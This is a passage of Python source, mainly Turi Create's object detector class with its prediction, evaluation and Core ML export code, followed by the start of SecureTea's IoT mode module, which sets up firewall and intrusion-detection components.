'non_maximum_suppression_threshold': params['non_maximum_suppression_threshold'],
'annotations': annotations,
'num_classes': num_classes,
'num_examples': num_images,
'num_bounding_boxes': num_instances,
'training_time': training_time,
'training_epochs': training_iterations * batch_size // num_images,
'training_iterations': training_iterations,
'max_iterations': max_iterations,
'training_loss': progress['smoothed_loss'],
}
return ObjectDetector(state)
class ObjectDetector(_CustomModel):
"""
An trained model that is ready to use for classification, exported to
Core ML, or for feature extraction.
This model should not be constructed directly.
"""
_PYTHON_OBJECT_DETECTOR_VERSION = 1
def __init__(self, state):
self.__proxy__ = _PythonProxy(state)
@classmethod
def _native_name(cls):
return "object_detector"
def _get_native_state(self):
state = self.__proxy__.get_state()
mxnet_params = state['_model'].collect_params()
state['_model'] = _mxnet_utils.get_gluon_net_params_state(mxnet_params)
return state
def _get_version(self):
return self._PYTHON_OBJECT_DETECTOR_VERSION
@classmethod
def _load_version(cls, state, version):
_tkutl._model_version_check(version, cls._PYTHON_OBJECT_DETECTOR_VERSION)
from ._model import tiny_darknet as _tiny_darknet
num_anchors = len(state['anchors'])
num_classes = state['num_classes']
output_size = (num_classes + 5) * num_anchors
net = _tiny_darknet(output_size=output_size)
ctx = _mxnet_utils.get_mxnet_context(max_devices=state['batch_size'])
net_params = net.collect_params()
_mxnet_utils.load_net_params_from_state(net_params, state['_model'], ctx=ctx)
state['_model'] = net
state['input_image_shape'] = tuple([int(i) for i in state['input_image_shape']])
state['_grid_shape'] = tuple([int(i) for i in state['_grid_shape']])
return ObjectDetector(state)
def __str__(self):
"""
Return a string description of the model to the ``print`` method.
Returns
-------
out : string
A description of the ObjectDetector.
"""
return self.__repr__()
def __repr__(self):
"""
Print a string description of the model when the model name is entered
in the terminal.
"""
width = 40
sections, section_titles = self._get_summary_struct()
out = _tkutl._toolkit_repr_print(self, sections, section_titles,
width=width)
return out
def _get_summary_struct(self):
"""
Returns a structured description of the model, including (where
relevant) the schema of the training data, description of the training
data, training statistics, and model hyperparameters.
Returns
-------
sections : list (of list of tuples)
A list of summary sections.
Each section is a list.
Each item in a section list is a tuple of the form:
('<label>','<field>')
section_titles: list
A list of section titles.
The order matches that of the 'sections' object.
"""
model_fields = [
('Model', 'model'),
('Number of classes', 'num_classes'),
('Non-maximum suppression threshold', 'non_maximum_suppression_threshold'),
('Input image shape', 'input_image_shape'),
]
training_fields = [
('Training time', '_training_time_as_string'),
('Training epochs', 'training_epochs'),
('Training iterations', 'training_iterations'),
('Number of examples (images)', 'num_examples'),
('Number of bounding boxes (instances)', 'num_bounding_boxes'),
('Final loss (specific to model)', 'training_loss'),
]
section_titles = ['Schema', 'Training summary']
return([model_fields, training_fields], section_titles)
def _predict_with_options(self, dataset, with_ground_truth,
postprocess=True, confidence_threshold=0.001,
verbose=True):
"""
Predict with options for what kind of SFrame should be returned.
If postprocess is False, a single numpy array with raw unprocessed
results will be returned.
"""
_raise_error_if_not_detection_sframe(dataset, self.feature, self.annotations,
require_annotations=with_ground_truth)
from ._sframe_loader import SFrameDetectionIter as _SFrameDetectionIter
from ._detection import (yolo_map_to_bounding_boxes as _yolo_map_to_bounding_boxes,
non_maximum_suppression as _non_maximum_suppression,
bbox_to_ybox as _bbox_to_ybox)
import mxnet as _mx
loader = _SFrameDetectionIter(dataset,
batch_size=self.batch_size,
input_shape=self.input_image_shape[1:],
output_shape=self._grid_shape,
anchors=self.anchors,
class_to_index=self._class_to_index,
loader_type='stretched',
load_labels=with_ground_truth,
shuffle=False,
epochs=1,
feature_column=self.feature,
annotations_column=self.annotations)
num_anchors = len(self.anchors)
preds_per_box = 5 + len(self.classes)
output_size = preds_per_box * num_anchors
# If prediction is done with ground truth, two sframes of the same
# structure are returned, the second one containing ground truth labels
num_returns = 2 if with_ground_truth else 1
sf_builders = [
_tc.SFrameBuilder([int, str, float, float, float, float, float],
column_names=['row_id', 'label', 'confidence',
'x', 'y', 'width', 'height'])
for _ in range(num_returns)
]
num_mxnet_gpus = _mxnet_utils.get_num_gpus_in_use(max_devices=self.batch_size)
use_mps = _use_mps() and num_mxnet_gpus == 0
if use_mps:
if not hasattr(self, '_mps_inference_net') or self._mps_inference_net is None:
mps_net_params = _mxnet_network_to_mps_params(self._model.collect_params())
mps_config = {
'mode': _MpsGraphMode.Inference,
'od_include_network': True,
'od_include_loss': False,
}
mps_net = _get_mps_od_net(input_image_shape=self.input_image_shape,
batch_size=self.batch_size,
output_size=output_size,
anchors=self.anchors,
config=mps_config,
weights=mps_net_params)
self._mps_inference_net = mps_net
dataset_size = len(dataset)
ctx = _mxnet_utils.get_mxnet_context()
done = False
last_time = 0
raw_results = []
for batch in loader:
if batch.pad is not None:
size = self.batch_size - batch.pad
b_data = _mx.nd.slice_axis(batch.data[0], axis=0, begin=0, end=size)
b_indices = _mx.nd.slice_axis(batch.label[1], axis=0, begin=0, end=size)
b_oshapes = _mx.nd.slice_axis(batch.label[2], axis=0, begin=0, end=size)
else:
b_data = batch.data[0]
b_indices = batch.label[1]
b_oshapes = batch.label[2]
size = self.batch_size
if b_data.shape[0] < len(ctx):
ctx0 = ctx[:b_data.shape[0]]
else:
ctx0 = ctx
split_data = _mx.gluon.utils.split_and_load(b_data, ctx_list=ctx0, even_split=False)
split_indices = _mx.gluon.utils.split_data(b_indices, num_slice=len(ctx0), even_split=False)
split_oshapes = _mx.gluon.utils.split_data(b_oshapes, num_slice=len(ctx0), even_split=False)
for data, indices, oshapes in zip(split_data, split_indices, split_oshapes):
if use_mps:
mps_data = _mxnet_to_mps(data.asnumpy())
n_samples = mps_data.shape[0]
if mps_data.shape[0] != self.batch_size:
mps_data_padded = _np.zeros((self.batch_size,) + mps_data.shape[1:],
dtype=mps_data.dtype)
mps_data_padded[:mps_data.shape[0]] = mps_data
mps_data = mps_data_padded
self._mps_inference_net.start_batch(mps_data)
mps_z = self._mps_inference_net.wait_for_batch()[:n_samples]
z = _mps_to_mxnet(mps_z)
else:
z = self._model(data).asnumpy()
if not postprocess:
raw_results.append(z)
continue
ypred = z.transpose(0, 2, 3, 1)
ypred = ypred.reshape(ypred.shape[:-1] + (num_anchors, -1))
zipped = zip(indices.asnumpy(), ypred, oshapes.asnumpy())
for index0, output0, oshape0 in zipped:
index0 = int(index0)
x_boxes, x_classes, x_scores = _yolo_map_to_bounding_boxes(
output0[_np.newaxis], anchors=self.anchors,
confidence_threshold=confidence_threshold,
nms_thresh=None)
x_boxes0 = _np.array(x_boxes).reshape(-1, 4)
# Normalize
x_boxes0[:, 0::2] /= self.input_image_shape[1]
x_boxes0[:, 1::2] /= self.input_image_shape[2]
# Re-shape to original input size
x_boxes0[:, 0::2] *= oshape0[0]
x_boxes0[:, 1::2] *= oshape0[1]
# Clip the boxes to the original sizes
x_boxes0[:, 0::2] = _np.clip(x_boxes0[:, 0::2], 0, oshape0[0])
x_boxes0[:, 1::2] = _np.clip(x_boxes0[:, 1::2], 0, oshape0[1])
# Non-maximum suppression (also limit to 100 detection per
# image, inspired by the evaluation in COCO)
x_boxes0, x_classes, x_scores = _non_maximum_suppression(
x_boxes0, x_classes, x_scores,
num_classes=self.num_classes, threshold=self.non_maximum_suppression_threshold,
limit=100)
for bbox, cls, s in zip(x_boxes0, x_classes, x_scores):
cls = int(cls)
values = [index0, self.classes[cls], s] + list(_bbox_to_ybox(bbox))
sf_builders[0].append(values)
if index0 == len(dataset) - 1:
done = True
cur_time = _time.time()
# Do not print process if only a few samples are predicted
if verbose and (dataset_size >= 5 and cur_time > last_time + 10 or done):
print('Predicting {cur_n:{width}d}/{max_n:{width}d}'.format(
cur_n=index0 + 1, max_n=dataset_size, width=len(str(dataset_size))))
last_time = cur_time
if done:
break
# Ground truth
if with_ground_truth:
zipped = _itertools.islice(zip(batch.label[1].asnumpy(), batch.raw_bboxes, batch.raw_classes), size)
for index0, bbox0, cls0 in zipped:
index0 = int(index0)
for bbox, cls in zip(bbox0, cls0):
cls = int(cls)
if cls == -1:
break
values = [index0, self.classes[cls], 1.0] + list(bbox)
sf_builders[1].append(values)
if index0 == len(dataset) - 1:
break
if postprocess:
ret = tuple([sb.close() for sb in sf_builders])
if len(ret) == 1:
return ret[0]
else:
return ret
else:
return _np.concatenate(raw_results, axis=0)
def _raw_predict(self, dataset):
return self._predict_with_options(dataset, with_ground_truth=False,
postprocess=False)
def predict(self, dataset, confidence_threshold=0.25, verbose=True):
"""
Predict object instances in an sframe of images.
Parameters
----------
dataset : SFrame
A dataset that has the same columns that were used during training.
If the annotations column exists in ``dataset`` it will be ignored
while making predictions.
confidence_threshold : float
Only return predictions above this level of confidence. The
threshold can range from 0 to 1.
verbose : bool
If True, prints prediction progress.
Returns
-------
out : SArray
An SArray with model predictions. Each element corresponds to
an image and contains a list of dictionaries. Each dictionary
describes an object instances that was found in the image.
See Also
--------
evaluate
Examples
--------
.. sourcecode:: python
# Make predictions
>>> pred = model.predict(data)
# Stack predictions, for a better overview
>>> turicreate.object_detector.util.stack_annotations(pred)
Data:
+--------+------------+-------+-------+-------+-------+--------+
| row_id | confidence | label | x | y | width | height |
+--------+------------+-------+-------+-------+-------+--------+
| 0 | 0.98 | dog | 123.0 | 128.0 | 80.0 | 182.0 |
| 0 | 0.67 | cat | 150.0 | 183.0 | 129.0 | 101.0 |
| 1 | 0.8 | dog | 50.0 | 432.0 | 65.0 | 98.0 |
+--------+------------+-------+-------+-------+-------+--------+
[3 rows x 7 columns]
# Visualize predictions by generating a new column of marked up images
>>> data['image_pred'] = turicreate.object_detector.util.draw_bounding_boxes(data['image'], data['predictions'])
"""
_numeric_param_check_range('confidence_threshold', confidence_threshold, 0.0, 1.0)
stacked_pred = self._predict_with_options(dataset, with_ground_truth=False,
confidence_threshold=confidence_threshold,
verbose=verbose)
from . import util
return util.unstack_annotations(stacked_pred, num_rows=len(dataset))
def evaluate(self, dataset, metric='auto', output_type='dict', verbose=True):
"""
Evaluate the model by making predictions and comparing these to ground
truth bounding box annotations.
Parameters
----------
dataset : SFrame
Dataset of new observations. Must include columns with the same
names as the annotations and feature used for model training.
Additional columns are ignored.
metric : str or list, optional
Name of the evaluation metric or list of several names. The primary
metric is average precision, which is the area under the
precision/recall curve and reported as a value between 0 and 1 (1
being perfect). Possible values are:
- 'auto' : Returns all primary metrics.
- 'all' : Returns all available metrics.
- 'average_precision_50' : Average precision per class with
intersection-over-union threshold at
50% (PASCAL VOC metric).
- 'average_precision' : Average precision per class calculated over multiple
intersection-over-union thresholds
(at 50%, 55%, ..., 95%) and averaged.
- 'mean_average_precision_50' : Mean over all classes (for ``'average_precision_50'``).
This is the primary single-value metric.
- 'mean_average_precision' : Mean over all classes (for ``'average_precision'``)
output_type : str
Type of output:
- 'dict' : You are given a dictionary where each key is a metric name and the
value is another dictionary containing class-to-metric entries.
- 'sframe' : All metrics are returned as a single `SFrame`, where each row is a
class and each column is a metric. Metrics that are averaged over
class cannot be returned and are ignored under this format.
However, these are easily computed from the `SFrame` (e.g.
``results['average_precision'].mean()``).
verbose : bool
If True, prints evaluation progress.
Returns
-------
out : dict / SFrame
Output type depends on the option `output_type`.
See Also
--------
create, predict
Examples
--------
>>> results = model.evaluate(data)
>>> print('mAP: {:.1%}'.format(results['mean_average_precision']))
mAP: 43.2%
"""
AP = 'average_precision'
MAP = 'mean_average_precision'
AP50 = 'average_precision_50'
MAP50 = 'mean_average_precision_50'
ALL_METRICS = {AP, MAP, AP50, MAP50}
if isinstance(metric, (list, tuple, set)):
metrics = metric
elif metric == 'all':
metrics = ALL_METRICS
elif metric == 'auto':
metrics = {AP50, MAP50}
elif metric in ALL_METRICS:
metrics = {metric}
else:
raise _ToolkitError("Metric '{}' not supported".format(metric))
pred, gt = self._predict_with_options(dataset, with_ground_truth=True,
verbose=verbose)
pred_df = pred.to_dataframe()
gt_df = gt.to_dataframe()
thresholds = _np.arange(0.5, 1.0, 0.05)
all_th_aps = _average_precision(pred_df, gt_df,
class_to_index=self._class_to_index,
iou_thresholds=thresholds)
def class_dict(aps):
return {classname: aps[index]
for classname, index in self._class_to_index.items()}
if output_type == 'dict':
ret = {}
if AP50 in metrics:
ret[AP50] = class_dict(all_th_aps[0])
if AP in metrics:
ret[AP] = class_dict(all_th_aps.mean(0))
if MAP50 in metrics:
ret[MAP50] = all_th_aps[0].mean()
if MAP in metrics:
ret[MAP] = all_th_aps.mean()
elif output_type == 'sframe':
ret = _tc.SFrame({'label': self.classes})
if AP50 in metrics:
ret[AP50] = all_th_aps[0]
if AP in metrics:
ret[AP] = all_th_aps.mean(0)
else:
raise _ToolkitError("Output type '{}' not supported".format(output_type))
return ret
def export_coreml(self, filename,
include_non_maximum_suppression = True,
iou_threshold = None,
confidence_threshold = None):
"""
Save the model in Core ML format. The Core ML model takes an image of
fixed size as input and produces two output arrays: `confidence` and
`coordinates`.
The first one, `confidence` is an `N`-by-`C` array, where `N` is the
number of instances predicted and `C` is the number of classes. The
number `N` is fixed and will include many low-confidence predictions.
The instances are not sorted by confidence, so the first one will
generally not have the highest confidence (unlike in `predict`). Also
unlike the `predict` function, the instances have not undergone
what is called `non-maximum suppression`, which means there could be
several instances close in location and size that have all discovered
the same object instance. Confidences do not need to sum to 1 over the
classes; any remaining probability is implied as confidence there is no
object instance present at all at the given coordinates. The classes
appear in the array alphabetically sorted.
The second array `coordinates` is of size `N`-by-4, where the first
dimension `N` again represents instances and corresponds to the
`confidence` array. The second dimension represents `x`, `y`, `width`,
`height`, in that order. The values are represented in relative
coordinates, so (0.5, 0.5) represents the center of the image and (1,
1) the bottom right corner. You will need to multiply the relative
values with the original image size before you resized it to the fixed
input size to get pixel-value coordinates similar to `predict`.
See Also
--------
save
Parameters
----------
filename : string
The path of the file where we want to save the Core ML model.
include_non_maximum_suppression : bool
Non-maximum suppression is only available in iOS 12+.
A boolean parameter to indicate whether the Core ML model should be
saved with built-in non-maximum suppression or not.
This parameter is set to True by default.
iou_threshold : float
Threshold value for non-maximum suppression. Non-maximum suppression
prevents multiple bounding boxes appearing over a single object.
This threshold, set between 0 and 1, controls how aggressive this
suppression is. A value of 1 means no maximum suppression will
occur, while a value of 0 will maximally suppress neighboring
boxes around a prediction.
confidence_threshold : float
Only return predictions above this level of confidence. The
threshold can range from 0 to 1.
Examples
--------
>>> model.export_coreml('detector.mlmodel')
"""
import mxnet as _mx
from .._mxnet_to_coreml import _mxnet_converter
import coremltools
from coremltools.models import datatypes, neural_network
if not iou_threshold: iou_threshold = self.non_maximum_suppression_threshold
if not confidence_threshold: confidence_threshold = 0.25
preds_per_box = 5 + self.num_classes
num_anchors = len(self.anchors)
num_classes = self.num_classes
batch_size = 1
image_shape = (batch_size,) + tuple(self.input_image_shape)
s_image_uint8 = _mx.sym.Variable(self.feature, shape=image_shape, dtype=_np.float32)
s_image = s_image_uint8 / 255
# Swap a maxpool+slice in mxnet to a coreml natively supported layer
from copy import copy
net = copy(self._model)
net._children = copy(self._model._children)
from ._model import _SpecialDarknetMaxpoolBlock
op = _SpecialDarknetMaxpoolBlock(name='pool5')
# Make sure we are removing the right layers
assert (self._model[23].name == 'pool5' and
self._model[24].name == 'specialcrop5')
del net._children[24]
net._children[23] = op
s_ymap = net(s_image)
mod = _mx.mod.Module(symbol=s_ymap, label_names=None, data_names=[self.feature])
mod.bind(for_training=False, data_shapes=[(self.feature, image_shape)])
# Copy over params from net
mod.init_params()
arg_params, aux_params = mod.get_params()
net_params = net.collect_params()
new_arg_params = {}
for k, param in arg_params.items():
new_arg_params[k] = net_params[k].data(net_params[k].list_ctx()[0])
new_aux_params = {}
for k, param in aux_params.items():
new_aux_params[k] = net_params[k].data(net_params[k].list_ctx()[0])
mod.set_params(new_arg_params, new_aux_params)
input_names = [self.feature]
input_dims = [list(self.input_image_shape)]
input_types = [datatypes.Array(*dim) for dim in input_dims]
input_features = list(zip(input_names, input_types))
num_spatial = self._grid_shape[0] * self._grid_shape[1]
num_bounding_boxes = num_anchors * num_spatial
CONFIDENCE_STR = ("raw_confidence" if include_non_maximum_suppression
else "confidence")
COORDINATES_STR = ("raw_coordinates" if include_non_maximum_suppression
else "coordinates")
output_names = [
CONFIDENCE_STR,
COORDINATES_STR
]
output_dims = [
(num_bounding_boxes, num_classes),
(num_bounding_boxes, 4),
]
output_types = [datatypes.Array(*dim) for dim in output_dims]
output_features = list(zip(output_names, output_types))
mode = None
builder = neural_network.NeuralNetworkBuilder(input_features, output_features, mode)
_mxnet_converter.convert(mod, mode=None,
input_shape=[(self.feature, image_shape)],
builder=builder, verbose=False)
prefix = '__tc__internal__'
# (1, B, C+5, S*S)
builder.add_reshape(name=prefix + 'ymap_sp_pre',
target_shape=[batch_size, num_anchors, preds_per_box, num_spatial],
mode=0,
input_name='conv8_fwd_output',
output_name=prefix + 'ymap_sp_pre')
# (1, C+5, B, S*S)
builder.add_permute(name=prefix + 'ymap_sp',
dim=[0, 2, 1, 3],
input_name=prefix + 'ymap_sp_pre',
output_name=prefix + 'ymap_sp')
# POSITION: X/Y
# (1, 2, B, S*S)
builder.add_slice(name=prefix + 'raw_rel_xy_sp',
axis='channel',
start_index=0,
end_index=2,
stride=1,
input_name=prefix + 'ymap_sp',
output_name=prefix + 'raw_rel_xy_sp')
# (1, 2, B, S*S)
builder.add_activation(name=prefix + 'rel_xy_sp',
non_linearity='SIGMOID',
input_name=prefix + 'raw_rel_xy_sp',
output_name=prefix + 'rel_xy_sp')
# (1, 2, B*H*W, 1)
builder.add_reshape(name=prefix + 'rel_xy',
target_shape=[batch_size, 2, num_bounding_boxes, 1],
mode=0,
input_name=prefix + 'rel_xy_sp',
output_name=prefix + 'rel_xy')
c_xy = _np.array(_np.meshgrid(_np.arange(self._grid_shape[1]),
_np.arange(self._grid_shape[0])), dtype=_np.float32)
c_xy_reshaped = (_np.tile(c_xy[:, _np.newaxis], (num_anchors, 1, 1))
.reshape(2, -1))[_np.newaxis, ..., _np.newaxis]
# (1, 2, B*H*W, 1)
builder.add_load_constant(prefix + 'constant_xy',
constant_value=c_xy_reshaped,
shape=c_xy_reshaped.shape[1:],
output_name=prefix + 'constant_xy')
# (1, 2, B*H*W, 1)
builder.add_elementwise(name=prefix + 'xy',
mode='ADD',
input_names=[prefix + 'constant_xy', prefix + 'rel_xy'],
output_name=prefix + 'xy')
# SHAPE: WIDTH/HEIGHT
# (1, 2, B, S*S)
builder.add_slice(name=prefix + 'raw_rel_wh_sp',
axis='channel',
start_index=2,
end_index=4,
stride=1,
input_name=prefix + 'ymap_sp',
output_name=prefix + 'raw_rel_wh_sp')
# (1, 2, B, S*S)
builder.add_unary(name=prefix + 'rel_wh_sp',
mode='exp',
input_name=prefix + 'raw_rel_wh_sp',
output_name=prefix + 'rel_wh_sp')
# (1, 2*B, S, S)
builder.add_reshape(name=prefix + 'rel_wh',
target_shape=[batch_size, 2 * num_anchors] + list(self._grid_shape),
mode=0,
input_name=prefix + 'rel_wh_sp',
output_name=prefix + 'rel_wh')
np_anchors = _np.asarray(self.anchors, dtype=_np.float32).T
anchors_0 = _np.tile(np_anchors.reshape([2 * num_anchors, 1, 1]), self._grid_shape)
# (1, 2*B, S, S)
builder.add_load_constant(name=prefix + 'c_anchors',
constant_value=anchors_0,
shape=anchors_0.shape,
output_name=prefix + 'c_anchors')
# (1, 2*B, S, S)
builder.add_elementwise(name=prefix + 'wh_pre',
mode='MULTIPLY',
input_names=[prefix + 'c_anchors', prefix + 'rel_wh'],
output_name=prefix + 'wh_pre')
# (1, 2, B*H*W, 1)
builder.add_reshape(name=prefix + 'wh',
target_shape=[1, 2, num_bounding_boxes, 1],
mode=0,
input_name=prefix + 'wh_pre',
output_name=prefix + 'wh')
# (1, 4, B*H*W, 1)
builder.add_elementwise(name=prefix + 'boxes_out_transposed',
mode='CONCAT',
input_names=[prefix + 'xy', prefix + 'wh'],
output_name=prefix + 'boxes_out_transposed')
# (1, B*H*W, 4, 1)
builder.add_permute(name=prefix + 'boxes_out',
dim=[0, 2, 1, 3],
input_name=prefix + 'boxes_out_transposed',
output_name=prefix + 'boxes_out')
scale = _np.zeros((num_bounding_boxes, 4, 1))
scale[:, 0::2] = 1.0 / self._grid_shape[1]
scale[:, 1::2] = 1.0 / self._grid_shape[0]
# (1, B*H*W, 4, 1)
builder.add_scale(name=COORDINATES_STR,
W=scale,
b=0,
has_bias=False,
shape_scale=(num_bounding_boxes, 4, 1),
input_name=prefix + 'boxes_out',
output_name=COORDINATES_STR)
# CLASS PROBABILITIES AND OBJECT CONFIDENCE
# (1, C, B, H*W)
builder.add_slice(name=prefix + 'scores_sp',
axis='channel',
start_index=5,
end_index=preds_per_box,
stride=1,
input_name=prefix + 'ymap_sp',
output_name=prefix + 'scores_sp')
# (1, C, B, H*W)
builder.add_softmax(name=prefix + 'probs_sp',
input_name=prefix + 'scores_sp',
output_name=prefix + 'probs_sp')
# (1, 1, B, H*W)
builder.add_slice(name=prefix + 'logit_conf_sp',
axis='channel',
start_index=4,
end_index=5,
stride=1,
input_name=prefix + 'ymap_sp',
output_name=prefix + 'logit_conf_sp')
# (1, 1, B, H*W)
builder.add_activation(name=prefix + 'conf_sp',
non_linearity='SIGMOID',
input_name=prefix + 'logit_conf_sp',
output_name=prefix + 'conf_sp')
# (1, C, B, H*W)
if num_classes > 1:
conf = prefix + 'conf_tiled_sp'
builder.add_elementwise(name=prefix + 'conf_tiled_sp',
mode='CONCAT',
input_names=[prefix+'conf_sp']*num_classes,
output_name=conf)
else:
conf = prefix + 'conf_sp'
# (1, C, B, H*W)
builder.add_elementwise(name=prefix + 'confprobs_sp',
mode='MULTIPLY',
input_names=[conf, prefix + 'probs_sp'],
output_name=prefix + 'confprobs_sp')
# (1, C, B*H*W, 1)
builder.add_reshape(name=prefix + 'confprobs_transposed',
target_shape=[1, num_classes, num_bounding_boxes, 1],
mode=0,
input_name=prefix + 'confprobs_sp',
output_name=prefix + 'confprobs_transposed')
# (1, B*H*W, C, 1)
builder.add_permute(name=CONFIDENCE_STR,
dim=[0, 2, 1, 3],
input_name=prefix + 'confprobs_transposed',
output_name=CONFIDENCE_STR)
_mxnet_converter._set_input_output_layers(
builder, input_names, output_names)
builder.set_input(input_names, input_dims)
builder.set_output(output_names, output_dims)
builder.set_pre_processing_parameters(image_input_names=self.feature)
model = builder.spec
if include_non_maximum_suppression:
# Non-Maximum Suppression is a post-processing algorithm
# responsible for merging all detections that belong to the
# same object.
# Core ML schematic
# +------------------------------------+
# | Pipeline |
# | |
# | +------------+ +-------------+ |
# | | Neural | | Non-maximum | |
# | | network +---> suppression +-----> confidences
# Image +----> | | | |
# | | +---> +-----> coordinates
# | | | | | |
# Optional inputs: | +------------+ +-^---^-------+ |
# | | | |
# IOU threshold +-----------------------+ | |
# | | |
# Confidence threshold +---------------------------+ |
# +------------------------------------+
model_neural_network = model.neuralNetwork
model.specificationVersion = 3
model.pipeline.ParseFromString(b'')
model.pipeline.models.add()
model.pipeline.models[0].neuralNetwork.ParseFromString(b'')
model.pipeline.models.add()
model.pipeline.models[1].nonMaximumSuppression.ParseFromString(b'')
# begin: Neural network model
nn_model = model.pipeline.models[0]
nn_model.description.ParseFromString(b'')
input_image = model.description.input[0]
input_image.type.imageType.width = self.input_image_shape[1]
input_image.type.imageType.height = self.input_image_shape[2]
nn_model.description.input.add()
nn_model.description.input[0].ParseFromString(
input_image.SerializeToString())
for i in range(2):
del model.description.output[i].type.multiArrayType.shape[:]
names = ["raw_confidence", "raw_coordinates"]
bounds = [self.num_classes, 4]
for i in range(2):
output_i = model.description.output[i]
output_i.name = names[i]
for j in range(2):
ma_type = output_i.type.multiArrayType
ma_type.shapeRange.sizeRanges.add()
ma_type.shapeRange.sizeRanges[j].lowerBound = (
bounds[i] if j == 1 else 0)
ma_type.shapeRange.sizeRanges[j].upperBound = (
bounds[i] if j == 1 else -1)
nn_model.description.output.add()
nn_model.description.output[i].ParseFromString(
output_i.SerializeToString())
ma_type = nn_model.description.output[i].type.multiArrayType
ma_type.shape.append(num_bounding_boxes)
ma_type.shape.append(bounds[i])
# Think more about this line
nn_model.neuralNetwork.ParseFromString(
model_neural_network.SerializeToString())
nn_model.specificationVersion = model.specificationVersion
# end: Neural network model
# begin: Non maximum suppression model
nms_model = model.pipeline.models[1]
nms_model_nonMaxSup = nms_model.nonMaximumSuppression
for i in range(2):
output_i = model.description.output[i]
nms_model.description.input.add()
nms_model.description.input[i].ParseFromString(
output_i.SerializeToString())
nms_model.description.output.add()
nms_model.description.output[i].ParseFromString(
output_i.SerializeToString())
nms_model.description.output[i].name = (
'confidence' if i==0 else 'coordinates')
nms_model_nonMaxSup.iouThreshold = iou_threshold
nms_model_nonMaxSup.confidenceThreshold = confidence_threshold
nms_model_nonMaxSup.confidenceInputFeatureName = 'raw_confidence'
nms_model_nonMaxSup.coordinatesInputFeatureName = 'raw_coordinates'
nms_model_nonMaxSup.confidenceOutputFeatureName = 'confidence'
nms_model_nonMaxSup.coordinatesOutputFeatureName = 'coordinates'
nms_model.specificationVersion = model.specificationVersion
nms_model_nonMaxSup.stringClassLabels.vector.extend(self.classes)
for i in range(2):
nms_model.description.input[i].ParseFromString(
nn_model.description.output[i].SerializeToString()
)
if include_non_maximum_suppression:
# Iou Threshold
IOU_THRESHOLD_STRING = 'iouThreshold'
model.description.input.add()
model.description.input[1].type.doubleType.ParseFromString(b'')
model.description.input[1].name = IOU_THRESHOLD_STRING
nms_model.description.input.add()
nms_model.description.input[2].ParseFromString(
model.description.input[1].SerializeToString()
)
nms_model_nonMaxSup.iouThresholdInputFeatureName = IOU_THRESHOLD_STRING
# Confidence Threshold
CONFIDENCE_THRESHOLD_STRING = 'confidenceThreshold'
model.description.input.add()
model.description.input[2].type.doubleType.ParseFromString(b'')
model.description.input[2].name = CONFIDENCE_THRESHOLD_STRING
nms_model.description.input.add()
nms_model.description.input[3].ParseFromString(
model.description.input[2].SerializeToString())
nms_model_nonMaxSup.confidenceThresholdInputFeatureName = \
CONFIDENCE_THRESHOLD_STRING
# end: Non maximum suppression model
model.description.output[0].name = 'confidence'
model.description.output[1].name = 'coordinates'
iouThresholdString = '(optional) IOU Threshold override (default: {})'
confidenceThresholdString = ('(optional)' +
' Confidence Threshold override (default: {})')
mlmodel = coremltools.models.MLModel(model)
model_type = 'object detector (%s)' % self.model
mlmodel.short_description = _coreml_utils._mlmodel_short_description(
model_type)
mlmodel.input_description[self.feature] = 'Input image'
if include_non_maximum_suppression:
iouThresholdString = '(optional) IOU Threshold override (default: {})'
mlmodel.input_description['iouThreshold'] = \
iouThresholdString.format(iou_threshold)
confidenceThresholdString = ('(optional)' +
' Confidence Threshold override (default: {})')
mlmodel.input_description['confidenceThreshold'] = \
confidenceThresholdString.format(confidence_threshold)
mlmodel.output_description['confidence'] = \
u'Boxes \xd7 Class confidence (see user-defined metadata "classes")'
mlmodel.output_description['coordinates'] = \
u'Boxes \xd7 [x, y, width, height] (relative to image size)'
_coreml_utils._set_model_metadata(mlmodel, self.__class__.__name__, {
'model': self.model,
'max_iterations': str(self.max_iterations),
'training_iterations': str(self.training_iterations),
'include_non_maximum_suppression': str(
include_non_maximum_suppression),
'non_maximum_suppression_threshold': str(
iou_threshold),
'confidence_threshold': str(confidence_threshold),
'iou_threshold': str(iou_threshold),
'feature': self.feature,
'annotations': self.annotations,
'classes': ','.join(self.classes),
}, version=ObjectDetector._PYTHON_OBJECT_DETECTOR_VERSION)
mlmodel.save(filename)
|
iot_mode.py
|
# -*- coding: utf-8 -*-
u"""IoT Mode for SecureTea.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Author: Abhishek Sharma <abhishek_official@hotmail.com> , Jul 31 2019
Version: 1.5.1
Module: SecureTea
"""
# Import all the modules necessary for IoT mode
from securetea.lib.ids import secureTeaIDS
from securetea.lib.firewall import secureTeaFirewall
from securetea.lib.iot import iot_checker
from securetea import logger
import multiprocessing
import sys
class IoTMode(object):
"""IoTMode class."""
def __init__(self, debug=False, cred=None):
"""
Initialize IoTMode.
Args:
debug (bool): Log on terminal or not
cred (dict): Configuration credentials
Raises:
None
Returns
None
"""
self.debug = debug
# Initialize logger
self.logger = logger.SecureTeaLogger(
__name__,
debug=self.debug
)
# Initialize credentials
if cred is not None:
self.cred = cred
else:
self.logger.log(
"No configuraton parameters found, exiting",
logtype="error"
)
sys.exit(0)
# Initialize objects presence as false
self.firewall = False
self.ids = False
self.iot_checker = False
# Initialize empty process pool list
self.process_pool = list()
def create_objects(self):
"""
Create module (Firewall, IDS, IoT Checker) objects
if configuraton parameters are available for these.
Args:
None
Raises:
None
Returns:
None
"""
if self.cred.get("firewall"):
try:
self.logger.log(
"Initializing Firewall object",
logtype="info"
)
# Initialize Firewall object
self.firewallObj = secureTeaFirewall.SecureTeaFirewall(cred=self.cred,
debug=self.debug)
self.firewall = True
self.logger.log(
"Initialized Firewall object",
logtype="info"
)
except KeyError:
self.logger.log(
"Firewall configuration parameter not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("ids"):
try:
self.logger.log(
"Initializing IDS object",
logtype="info"
)
# Initialize IDS object
self.ids_obj = secureTeaIDS.SecureTeaIDS(cred=self.cred['ids'],
debug=self.debug)
self.ids = True
self.logger.log(
"Initialized IDS object",
logtype="info"
)
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) parameter not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
try:
self.logger.log(
"Initializing IoT checker object",
logtype="info"
)
# Initialize IoT Checker object
self.iot_checker_obj = iot_checker.IoTChecker(debug=self.debug,
